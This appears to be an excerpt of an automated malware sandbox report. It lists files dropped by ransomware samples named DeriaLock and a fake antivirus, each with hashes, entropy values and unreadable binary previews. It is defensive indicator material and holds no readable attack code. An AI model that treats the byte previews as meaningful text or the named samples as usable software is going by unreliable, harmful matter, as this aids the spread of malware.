                                                                                                                                                            Preview:PK.........q.Fn....j..U.......Endermanch@AntivirusPro2017.exe%..........J.....5T...........8..K....C....w.+.&. &3..MT&.D..$`u./e.R.r.....=D0........O..'..r...*..%..zu.....]nT...b8c...5.{....$WeHK|.Ocb....h.6#.qD.*Y.......\.t....?mI..;._..bm...........g....2....R.n.&..{y.......(..N.q.2P.\(.+.O..$a.w`.3...%.\1.A.I....qc......Ci..D?a......].....;\mk.(.F+....[$.p.|G.....<.b\...Y.z+7..^...3l.D[..(...=q..Rt.}........}t..$s.!Z.e...W..!..)....nbv...-.../....?w..G..[..eo.iKP..:..l=9..lk.R..Z.Fy.I..}T 35.....v^..G.{.%$l...~...d]/-..F.t.{0.lD).oH..-r...2.e{t.._X.................nA[.S..D.$.4..p.&.......p..L...:"..M&..H...8.....o....|....79.6R.....B.S/..w......NA3=...c.....T..[..2..I..&.N......?Bj8p.t...>7.*..}O|Y.u.......~..,...RM.wO..].g...>\D...o...K+..o...;b$..\.6.z..o.L..(.jD._.A...\..M....y....p...[v..7.8RPJ..y..RdH..d..%...w.!..P=.J.m,.....<.`;^.:"...dV.f?tC.2H.....q..t...(....M..L....C-..<^.../.ZC..h.4.u..w.+"..~.).0P.&...;2.._.....X.....YB.I._~i.bc,....
                                                                                                                                                            Process:C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1410736
                                                                                                                                                            Entropy (8bit):7.999854281040059
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:24576:oSL6Ntp05P6ftXeQAPm1sPj54cubcZDUPKrFusldmR8uCbdfxgEgL+xTbQDE5GYJ:oftFtXr85409usl8R8vJgEdCY5n3Rv
                                                                                                                                                            MD5:E1AC4770F42BAC0E4A6826314331C6EA
                                                                                                                                                            SHA1:66493386AD995819871ACA4C30897B6F29AB358F
                                                                                                                                                            SHA-256:EABF7FDD31C5838D66CCBC3CA52B0F6EAF8120F83EED43F372F21E4D31734B73
                                                                                                                                                            SHA-512:E691103064075B24B1FC2F5B4D1A1C2701EE7C5074C96A7FAAF284F975DE3D7309E7A3EA9B80FB6A2D8950A3B12ACEB22E3516777508CAC70CBA8BE48527F55C
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:PK...........CF.\.............Endermanch@Antivirus.exe.z..o_+.....#...mg...$.YW..G.pCot.s...$.....R...a..:.....c.l.?.,r.)i..I...z.0.2F.5..b.F..Y..].C...po...".....(..>G..M6."7.~..}....VCb.._.U.L...........6o...........#A.[..1.......=..}.r..=B ....o...h.z.....c..h.o[.b...v%m.K..8F..~.m...]..../.i.d.B..]..........}.....2..z.n'....y.Kqx.3:%NEg@..._%[P.l..zp.....ai"...^L|......!X.....A....{...:......%..?.y.....=.R...} Q......K..0.n.Xh#.t.\....5....[~ZdF..%.T..j.n......?a;U..XO8.k..+...Q+..7...Mg...V.\...>........4...P.B"o.M.o.jJ..?.|h...<.....V.F/i.ru..L`(1.Vv.sd,.BD{s.t..+`.s.....m.b.9eh.... .3.../..T.q.: ....PZ....:v:o....wAV..s.....C......=..+...i.j. .G.1.U..D.zH+..}.k.!......q.....D..WL......7..L... .F....'..7..!...]!.:......tm,Q.DC....&.Vg..Q.A.\.;..>.[|l:...&Z.n...C...(..J3.O.*.....0.5..~.H...q.q...f..hI.4....(.V....:..V...}..2i&.?..U.?F....d.E....-tb&.U.HE.......1t..d....d...]....f."..%..Y'rD./.....p)......{..i............1.c.5)..Q...QW.pE
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.846794886702635
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:WP62dmIFVt9yxGQaC65Io0Z2H4E1yxcLV1rcGRi988:WP62FLlR8Z2YCfFTg88
                                                                                                                                                            MD5:E146DDDC1C7F5A4F78BC963DD1174E08
                                                                                                                                                            SHA1:050AB7B8325D173833C9F255B9DD2AAB7150B173
                                                                                                                                                            SHA-256:7BC162F66C145615488B3DAF6E2DF97888F657AB1C9CD79A13136946847C3D85
                                                                                                                                                            SHA-512:A47A9573CA88428EA13ECF88D600717EA96EDDEC0C00797A94888638E2ED3645BA51B6B29FE7603A3911891C2C6E3B66FA598E42C8DC27DA24059F0AE4D966A9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..`...._O...%.g..w..:.&S.-.b.s.;.....c.cZ{Q.....H..1..... k...D../.Q,....ov...R\....O..Y.E_u$.M...?..!Tx.{...g...... y....&<..-R.s....i8.T....V.....x.D2..\hf'/..^fO...w..P.R.U...2....z....T.vc.4......4.m..=\..-t....7..v7..j~P...J4/.S...Y..tvAd...........r...{.q....M.Hv...}...r..@+...q.4.{...k....,E.t.B...p....m..I...o...=..w...]T.<....|.?..c.d.#.V$*..U.....X...(.......9|?.^..`....XH....B...........>YB[/r.E8......(...s...Z.h..#f8....p.Y$#.X....l3.<.\?Kw7../,9.M.....36....O..J...}-$).-..u..I.5NP..b4..0..../W..S..l...N.=...,...Q.W..sb.H~A.B..M.Ah.B...^*......3.(..$.CB....&6.X..l3..5E...>.G.p.....o/..rm......N^X\.l%.b....$.7....K...o.m.ZwQ.......d.k......J*...7..z..Z#u....*.?.8.......f.]..9....7.ZB.S......d6.....TnY...I.....>.H.....h..=.2 .x....t..n.[..........y.j..".xN0...o.q.&.om".{...?...u.`.....'......R4...4.C*1..Y.w...q_.......J.q.!.O..t.. $....{].j........6..04&..k[.(E.......j>y.......>..c../.F\M......%+h....W....L..*f.....dF..cy...
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.8022291194675075
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:EE/X1NzXPU2gYCYgK+gONKW8lSL0kd/fBk8hlGOmn:EEffzXs3YH9UK3w0Ox5hcbn
                                                                                                                                                            MD5:AA834865A8F45D42FD0F112716BA7E68
                                                                                                                                                            SHA1:4F4A069964CD74AC90D14D8AC35D653943384960
                                                                                                                                                            SHA-256:D82FB3FC07F892CA48010AC098FD58B493555401AE66BD72AB993C483D487FE2
                                                                                                                                                            SHA-512:F128750877A3619633C366FEDBC7599307AA5EB13B559B91A6DE9A12A6A79B9C76A8459949A182D69E244C5B667439A3A03B66FC9EB02B0E97C5467471BA245A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:s..':..<..k.N.R.lL..I7.UYM?..5......O:K.t.O.-..m..e7...3<.#.FD...#[0...D.x...(/.........N...W{..Y;...P*.,T.....K.\...i....k.=..$8U..F5.H...q.T.0..".d....j.[m.c).4.g..}$...owm..8Q..Y`...&.YZ..._93._g7.c..)[....'u.(}.......L..h...M..5.no.....bpP...y...e...)..........5..L...K*.p&..%U...<'t..............5l.{...pT@.;.a.a.9..,...J.&.C2.f...D.!......0`.s;....t~.i."...9_.R....if.Y`....$d.$..q...w.....K#..G..v..3.Ti....;[.2....Vs%..;.......2..GI..Ol..K.|...R0..@<.<.F..[(...i...R+i.....x.5...R].j5j.....W..!#...........m.`..az..#....<'u..<..`X.....e...R.>"X.=.F.B.lP..ys.<4{;}......Ot..~..)..9Rm..d..k..;..S.i...W-...c.,.N+./.V=.6K;4.3..'e/Y9&......w...IZ.J;.y....}.?]R...=...k..f,....b).....J2..}...9W..||/{;.L-..H....Y...qW..n....}.o.z"...........;.......v.3D.....t.S..TXt|.Si9s.Y.......r..O..).R......e..'.5....W...f..=...2w.v......7ro...ek..|.;AkD&>nMY'.R...x...j&.z._.. ...|!h..R.1Lp.y...m....;...*)|..2.x7....+..@...m#C.OA.z9H.a..._b.$i....O
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.8141533542177
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:VARghomCWDYGElbuf2LVCQPJShNWy0zSbFFg:VAW2mCWrEBuf25CQQhIlzSbM
                                                                                                                                                            MD5:4C532DAF3B7EB2C23B95D2F978981740
                                                                                                                                                            SHA1:F25748001F3AE91D7C38B9BC177B7782B1D1846E
                                                                                                                                                            SHA-256:3F339DB7C627A72E57AF210253BE99F051BF33515CC95FCA2E0C5411A19C3CA8
                                                                                                                                                            SHA-512:4FB25F63D296AA0EADC18D8593D95FC1BD3CBF514FB57AA1FEFF5B06E52E694C9099EB8606628799504AC4DFF7CCD2B7C84F2CA39C03054F4E8250820C328125
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:V...n..y...'.~...$9.&.%...$.4..Yy.[..A...l..O......t...U....._V.r.eq..c_%_.....Pv.......f.5.j......h.$...Pf.8@;..]...S../.3....-.Gh....@;#.....a.....+.J.Q.....,ZAJ......Jl.....s.,...5.....G..]..[..iX.C.Y..P....cg.o[.C.V.)...{l.a..(.,QSl~.c..d(n..$W.g.....F.8.8.W...../..2csS..`....3......8H....(..t.v8.X....O....U.uz..j.8...-.......Y....a......\.......N...O.......u.....BMx-5.O.,@..B;.wF...xzh.n"(CFu......(...i.+..3.]\...q..}.f.._O.....y...u..Q.j.p[^...c.D.W+...d}...............=+..Bp......&n#...>..\.c..j+.K... t..`X\.K[...>..nQ.[..d...W=...._c..&+=.WN.?3..N#...<.D......y.e.Q.....T..nW^...(b.w.~....%Z..8....{-.8.....h..u.v...S..Zp...53k.f.....?..&...y.).n...f\.<D..cX...;....<1.<.!.g..D....Gh..o..;......6....U..7.9R..1,..g.G..;.eb.w..Y....,...g....P.y...Z.!16wM'....Am.h...A...u.0.h..+.c.,..8..5{...W.....2DmQ..J..e.~P.9..@.u.3.9......'[U..V7...w..nH.K5o...2."....&.p....V..:..F..`............N.^z...ck..kdH.;..3.).....T2....S`=b..\.<.z..Z
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.845724290522874
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:A6GBnQdlnA3r8HJp3vEwa75S5tafR4gCEUg+ixw6S8TQPS:A6Wuian3cwa85ERNUga58TQq
                                                                                                                                                            MD5:01D5DBE758F120501AE78E985021BBBD
                                                                                                                                                            SHA1:76B8A21729CF3FF413E0AB40D7F60A8336AD7B0F
                                                                                                                                                            SHA-256:12440CDBF3DE3CFE5077593B63C9147719570FE1C4147B358AE4BD3327A0FB23
                                                                                                                                                            SHA-512:60AF68990B5BAA52142D7623675B403ACFFF8765B54D820642D98C42F934FB4883712744423CC495B62284F27FF5C63CB9CEBAF8B39D682D8CFAE0D80DE057BF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:Xy..u<.s.r!....9|_\b.a7.i]........e.Y..3.Ek.!.IN.B;....P...$HC.D..GdN.c..W....d.......g..;.Z.}..,.%....d....jI...q,U..{....+GF....n.$.."1u.d[y-.....Q.j...&|.83.......%@.c.....{.0*5.n....,..>....Hr=!....=..+...s..'....4R..p.t{.#.Y;..h+.H..;&p....q..pb.|......$...X.]..h.1X..3.*K....&.).M....B.....&.ff..~..T...*C.*.Ww..\.=......$R.X......[{..L0..{....`.....%..7aiz".m..Q....*...&.......4`..C ......iq.O^E.> Am.|,..j{.._....r..8.KO..........3..c.H....E....c...4..&.C.A#\......6...(b.vL...(d$.......!...mA.\.Ts.'3.Ia..{Ut. ,K....W...!o..]4lV'K......"..C..=..{.U...A.GHo.P..Nz2.gp.(j.....^)Bp...V...P..J..I...><...3..2y......R..1.k,.....w....NM,..r#.D.;v8...@Qpf[.;7..Sc.[..3..l-!.<.;...v....1..j.`..n......g..v.....~.C).w..PT.R..~.Q}.g...|.......:.F..d......t..8..5...E....$e.../.......a....o{..........6..j.4.Y.V.....!...lk2.rF..(c...C..........[<SHT....hX...Q.7I..8k..+.....}...a=.f~.u.ae.KB....QU7....?..,|.q|0....]Pigp.\..<........M...p^
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.783729932870922
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:GsGOu0TntqliagLhxv3S6O1IWF9dWOs5p:GQbnFTtxv7KIOjWH
                                                                                                                                                            MD5:0B11B98958AAC19DBFC1471C14E6DD14
                                                                                                                                                            SHA1:D9560DB9B7D3587BF374B4A529BDDE52617602C9
                                                                                                                                                            SHA-256:12357FD5154D89B2FB41E570BB4E940931CA2F27CC8D813373CC2F932C7D9754
                                                                                                                                                            SHA-512:550CA8698BE63522F0C247EAE03A176D6CE29FC84926CF814E6263D4A15DCA4C19E7F290454F7DDEEB2DC73F1CD50BFF7A6A42BE5CF5133FDBD109D98411973B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.,.z..O..l.2..E.'....:..........dS...~M....n..q..%.5...g..,.i..d.+ye...I,...4....6...h.X.}7opfHG)...+.......[qo.&.&./I.o..@J.....kl.+I.9..\...-<..?.|.w. ..z..:71;W.J.......K....M..1........`..).{...g..I..`..>..a....E..!f.M.2 ?(.....\f6.+e....H.*.>.Y.X..e......M6">...).`....'....q..C...Y.@........E....el...\..!...f...YP...sR.8W.h.].%$H6..78....F....Z.;..!.:....E....\T..x.dbn....58h2.*.<HN{.;1_..IE.hqS..5z.....3..Z/...(..+t. .{.$(...L..M.. .q<%.>..N..pxO.9nh.\....Se.n.7.}..j!..B.y.....3.X.$#.......mSK.w..<.yl....f.j....g...k.Q....\.,...I...J....ww.4`M.i.]...MRxt$.!G.y_..7..N>{..e........3..B+>2.....B...?9Tc.PhS...XEVM.>qg..Q.....TL})L.f..b.69.7........-....r.....W.H%.S\..*7.$~?.......4...n....U-B?........'...ta...K...}.*Y.E.....*..,...W.2.>..a.....8.BQCTVP....Sw..AE.f......x. .........~..6.+...f@........vv...Ydlt......>.3N.....a1..6..\.@:..>D.M..U.....D<O.,.K.F...l..)..G....$<t;`..@".lQN1........w?....u..-/..."...@..?.oC..f;E.........x.y<33.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.7936852877186205
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:rSk6uxUD17v/4vGapSvkIVUJTeuvjwO+uxWjZD2vihHE:WJ/4npSvhVwTeeH+Bt2IE
                                                                                                                                                            MD5:DDFB8016AA7B3BD6868B9910D271B71D
                                                                                                                                                            SHA1:41D97C7DE230041F954758015A50B215702D8754
                                                                                                                                                            SHA-256:B47221A9995ACBE4A891F76CB538B622883D63940BEE8B62A40F4BC8ADEA010D
                                                                                                                                                            SHA-512:C6EEE0B1DA99261A9778DA00ACFFB457A3DD0401C8FD1ABEE58A355789BDB4C27EC136E1F13CE53241A19385F14DEBA91B96B8C2E0B9B4BEAE81555AF6E506B4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:....j....mE.D....B.zB..^...*..N.7F..|c..H@q.k.a.X^..[...;1.B8(.........ET+.....|...h(o.<lIm%.N..F..E-2I.z...3....{..:..._0...0g....F.e2.A... .mr.F2..A.-{.....Q..-.-.......m%...a.D.1..;..*...I..^7Lfy..<.x....;..e...RAs..t...v'K..A...D...#,*u...T..n.O.D...`...MY..5I.2ul.6....?...%._......>4i.._.WL...L{.m.d.g.."1.r.../..3...ES..3...?.{}..G`i...*8;\@.s,..|.....=....O0.\...%.0t.b..7.8&T.....c.J.;E$...?.rIX...b.'..'.. ..c...o.8..=...|..\..\.Y{.j..T.Y.4[....:By......Z ......,.......y....D....k'.+..~.s...f$...w65..t.\....,.].-b\..U..`..4...%T...E.d....`.bj..C.TS..V...tPV.v.).`,....C.....:.x.O......_Q.^.z.~.1+.F.p..)...=>..d.....(ok...\8.[n....e<.e.G..m....y.mf.{..~....bF.G..j...v..o.'....`.Er.....K.X...>{h..Vy%^.:G2Y|.&D.A..C..}...........o.Vw...w._.{... .]bB0.....t.[i...?.w.}..<...qX.T.O..8m<n....{z....!y#.LA=6.07c..<n.fx.\$......g..>~....2.A..O0Y....".O..3{$K....H....Y.8+.%..D_...x.....%.J.@....8.J..P........YCv.A1Z.>/..O...Z.Ov.Vq.f....o..;.x..u.9.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.813968269154084
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:XxnI752ie95kPcpfdSG1nMEHq+dZzZdmaH3owOdUe6jdw1+:XI5Y95KrQnpHq+dlpaUdu+
                                                                                                                                                            MD5:259180F4F78223FF0922CC3ED49D114B
                                                                                                                                                            SHA1:B1BFB62CEF830E203C3A5AB8F6A40918E238C2FC
                                                                                                                                                            SHA-256:A3D40A946B59606E97095F3F3BD27BFDF789311D67F3EE97E2E870B796B70B89
                                                                                                                                                            SHA-512:9427089BB6416D3ED464F7FF258252059D1263DD67064AAF8D5F0BA6852ECA940FFC721A850C6123493E84EBB0E589C56EA60E0CB12CA12F86029217724CB01D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:...u..$NHj..5....TY.mk.*w....Fc.4)...&0.W........'...PH.:c.j.t2~.....#i...v&..2I.7......\+Il.nr.+.4P..kB.....t.9..u...h.(iq|"..U......?...%.S....]........m.\E].....JO..).V+T..NN&94...8.n...Ik.K.L..>.q.!.\..?_.\s.d.BH.\..C..!.<...G4Jg.-zg....1..Pp.Z!.Q......w..q<[..Xe#4\./......7..m.S&......2....5..^cs.\.=%.Q...iw.......nI.....R.S/fS..-NUP!.x..jq...:.....;.\.{.}.4..p.t..<.J.x@....`....O.......&V.l...ZV..e....o.G.z...l.}.`..[%.......0.$@.......,...c3b...:MkS0......M...<.!...P}a.u.!t.8U.~.3.~[4..O.y.....`NF. ...:[5.>........y.^.2..-..%.W.#...S.....T.......g.O..r..hO...E...f[.s.ebv]e.c.....,.85..3.o(..,.....C..U.......'.2.D........pd._.]X:.a.13#......N..{.C....c]5fOX....}..|....H6...7.....a........Q.......Ov...G...].......H..XN...._...JF.v.`.iu....LO...#"..{\B_k.B.Ene.G.G.L.........1.s;F....V..`.....B..H7.%...}NZ.b...^..8...xW.YcZ.l4..>'b"tS..iM(.4z....N...#@&.t..<......$..d.v..... .w.;..DX....,$..o0.#<.F?..........p.(.m?*._.....b..N-.MB.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.8278362086140945
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:wiYtTMByijku6vuVhrrMrsrQ+iRMmUZr8Cab7nPLCoZPx4n:w5t8bIHuVtYICKrm7nPLCo9u
                                                                                                                                                            MD5:1FB138249DC39C67F4873E2D92E6CF29
                                                                                                                                                            SHA1:B83474C64A6FD838E414613714B25A69658D00A2
                                                                                                                                                            SHA-256:F2239C5893F09F658F55603A747A11B78882F8690C67A79D50E47CAB93273E7C
                                                                                                                                                            SHA-512:883864478F7F6A25796BDCE547BC7512C3BE4DDF24A451F41B068B849597259770536B03C3C7C91801F4B14CE20F34920C6A717B770A554F9A72B987A9B4A013
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:...>&...*.....?.......s....2...\.../A.K. .c...^r=.[1...5.i.c..'...(*-"....../fn..S2..=s....N2..G....q..f?.;..EC...MF.n..-.X.....,..S...M..s..l.7.)..v..(ke.0..-..W4..d.xi.LF.d..n.5.....k..k.~.H..k.'........B.....U.......Wia.k;8....u...S......pM>W.o..G..?_.T.qXT.4..E...5..L...)8e._../.hU.c..Y->....LZ1....a{g.d.|'..>...Yz&%..V+'LN....7%....r..:Y.E...0.l......p)g..^,...]...n^...!...8..e'... .7..5>..j.?......S.......V.4r......Fh<./..2...........I<.W..1.n!3-"w{5...9uU.)..F.../.R.A.'.:....+../@...]....<..Nr(........C..`.....?0.[g..QE...m.u..9...../cWY.&P%....3.s>..Tz.].I.g@.*W..G.4W...JT(..|H...k..<TqCi.MIn.@...!m.J.....p.U....`..}..e...I...<U..8[...C81.o\9L....O.+g..m..W..b:....J1g..V1.j.D...:.dw..L..u.+........`h....P...^..y..N+~#}.Z..x..7.L.._.?...[.#'.....Y...aC.:...0.........Zy...D..D=..7.M.=1.*...dv...'.v$...>..\t<.$.K...m..|N.Rq..=.D..K../*.4@......QW..ce....xl...l.6.-q?.........(e...-O..ux....h.+..h..=~......-9.].T.@T...>..X.V..E.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.7870645513400785
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:VQYUeGLK7VCd6CyYgtPiIY8SXu4Ziaz+FQolckC2k3V:ieLQd6Cyht5/4ZPkQMckC2kl
                                                                                                                                                            MD5:B2BD18134C7AFC85382B441607BBD2B3
                                                                                                                                                            SHA1:21BF7495738E6E59D847BCD97AE2FDD513436BC2
                                                                                                                                                            SHA-256:D52E01B3C95C116B2BC22DBC078EBAA12154440B85A36146749A5914A64495CB
                                                                                                                                                            SHA-512:933CE51332E986580B1705E8A801820E605977FE363832C4D1C155AC4D1A2A8A9C14B179E1557C9A59E3558944C36F1568515C5FC069AE6FE0B624ED953D0E31
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:n....qC2i....(.]{s...s....C..W.,F....M.L.....0\.9.I.OCWj.u.1..!...Mo...$.&...Z\...'......V..&..;H..".....{.5....g.......9\f.X.q.M...7.s/../.F....LP...h..z..|........]..;qy.dk....!...;s.v1s_.A...<Nj..g..%+.*..G.W.V.G..$..$.w..H.j..../Vr..%S.@...jk.O..d.e...^9#+.!...<.^.]..4..+..U:..G ..G..q~B.`{...BQ..70$........%..........uM<.+.....~B%......QX0.\a..2......[6.....,R.4$....e...P..3..!6.......[d.3.QN.S.#A....%.H.V..N.D.\b.s..cX!Kf.....eV..IDh.~.9R2q......$G#||.8M:..@..(,M..Mi..@...a3.EX...;._L\b......1.......v.PJ....l..g1"..l..'..f....u.....02.%..?b...._`.]..V.!l.r..1.......mFN.6`~.x{[[.1Th..QC..Z..X4...e....o9+.....+....._...h3...r,A.....e)-..u..'..;...Ypz.!...P.O.D.!K]A.....)d.&`.f\.v....0@.{.....i-?....6..r(..j.8ad.....S..Wd89....k...<._[..dN&/.....#....L..4 .!......5.|.0P.#/....z.,rn...V.D@'j...~*...]A.h.._y...Nf.G.......C..._..q...4....B.Q.9....."d......ss.....L..w1l..N.l.7.%..+...J.&.S....'.............?.(...cf.u$..&.........!..1..}...]
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.8149185942560395
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:MAppsmbijh2bzNy6lbdbZF+Rb797rWB7R13YSrm7jK5/MyJAho4ZeQ:MYpssEUzHn1ERb797rez3YSKSMaA9Zv
                                                                                                                                                            MD5:755CA754C71F5D0DC7638674ACEFCBF7
                                                                                                                                                            SHA1:6BA2239F8DBA54A84B1B4D0BB5FE496A2813513B
                                                                                                                                                            SHA-256:EDE96DAFD526731572281C1E2362FB0CBBB948FB61F8A6B81163AE2C116EBFA8
                                                                                                                                                            SHA-512:9444F86BFC87F8734D6EF642A18276EEA4D457DFB9EDD3FDB440A52452363970D1F2DEDB71E3741668D10501C9F53DC2DD07413DD9774DB69A8066B6A0723BA6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.?..i.}l.._.+.ib8x.p..?..|d|6....9.vH:.+...&#O.7>.p...2.f/...).H.h..rg.&.).'aB.dd?...^jH....%.....t>."(..3......+q......wE...G.t....Y...d)+..= .%.7D@..~.D.Y.._i7=....(..F\8..9............=I....5.E><..O..\0w:.F&...aFb.....;.i.W.\..4.(v.#.....>.mW..$".......#...a1...C....J..C.+.{...|.<.bJ.OM.....I.k".M.5..E..N#........!.F=r.^X.)#.)r...H.Q...$.....d..m.R.d.8.j.l....2.}.........f.g...!.."..~...._.K..IB>.#.......^+k6.?.m.q......:.. .e.N.8N...Z..Y..&T......*.x..O'=........lMD..u...&....../..........P.[..A.TN.S.?.I.2}..l.xl9.n..W..U1..>y.FlA....k,{.....1.?rRa......6C.....caJQ... .9#.~.r.k..".........c....$..Y...G..tI..-.5.>M..........i%ltL.J.r...lmz...o..........+..=.k..../v.U.z-....5".]..z/.>W.6H..|.....=@h5'...J...r59.<.p.......E.=..".K....8.f.9....&L.r..p.(..._..p.Q......Z|.........in...e..gf....bAl'..2..I.}i.M.d..'04.n.....{......:]z..6.........@....J.e...7.H..n....8...h...y....@b..lk..{.}y.P.@.P..7^...r....w..` ..A.i.........l.V....d....
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.80484691640739
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:cQuHjExVDQK0jfTh/u4/Q9jkSMRsBrb/3q2PslACBf:cQUcpcp/ueOxosB/y+YlF
                                                                                                                                                            MD5:A93D7BB4642261DB05985CE98A2C2CEA
                                                                                                                                                            SHA1:6FA0446EB9E561B9B9A58C34E372020B49CF56AC
                                                                                                                                                            SHA-256:1CDA410195BC03E241396D7E0E52AA3D7B7CA6ABAAFFE352AD1DD39654E908DF
                                                                                                                                                            SHA-512:6421D9B72979EB8DD7170741F21381F19A9D9A9C51A53CD71A577201C73EB544744A15F22127A0A335150AB04ADCB1DD9A17E33D57F38B32A869CE36077BB0EB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.5.];;W..d......(NZ.K/.....I2...;1..sIn|.......z{..V..O\.\....{.m|P......Kx..Ws.^......j>$.E.?F. ..Z(<.L.]..l._.l..>lTo.U<............5V.c...e....$........:...Q..p..........HW...\.n.z....''....... 9w...b;.s.]...K.1X$...x.....i.`X.y..F...w.~._373.D.)...Txs..j.I.?....I.|.....'..T..hI..z.J....W}Zx..(%Y........."2...T..S..c..U...)......a..!...).qH...pe.....UT..H......)*!%=@..U.$...fn..t>..|-...|[N..r.x]v..s..ft..jM{.......y..eF...FU..Z..i.:...t.<.>..^>].H.m.hI6..9S..._.!l.ku...i.._..:F...By.E...k..-'AV@.WW......6W.....N.@t..D......q_..>.x.?Y.KBh.w... .. .R*X...lb.sG..(.D.\.......(. ...]X/..*.wgV4j*(...[?gk.3Q2.i./.....!m...U.c.O....%.....>.....-.A.L.9...6..C. ....a.xl.8... .Wq.G.q..d.@.KA.#.@..A..~....4~....V.|~.06...JXGwt..}.(.~.%.8/.|..?.A.H...`x....&.E+..F...8.@o.@....r......x.. .(.... .<.....W.....r.N.u...y..}...|.....{.e.M&. ...K5..-$.*k....P..)..2X.o..`@m..S:W...a..tJ.d...wWl8.H....}....f;.P......g.S]y.mi......4*c..I.^../'.l.k....U.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:MPEG-4 LOAS
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.824911329095133
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:YkU7XZqFlWH96rFIKndBcdfkJeHZjYRhWeIB:/UVeswrFIKd6dfkJeHABk
                                                                                                                                                            MD5:69C50489F622320F46F75CEB9CAA1DCE
                                                                                                                                                            SHA1:20268B23EEEFB7DCD988F0D1A975C7F4EA0D4F1B
                                                                                                                                                            SHA-256:E14D47CE2608A2DCD211E2B7D84824C0180D229D50A30F6409DC1E1731D3A205
                                                                                                                                                            SHA-512:3ED8682503D95286562ADCABBC68205205E9E539533C267B22D7487B1C8491F3270BC06E9139FBD8DBEC7A6A538C89A322A6CB595C3B5C35CFBA78FCAB62EBA6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
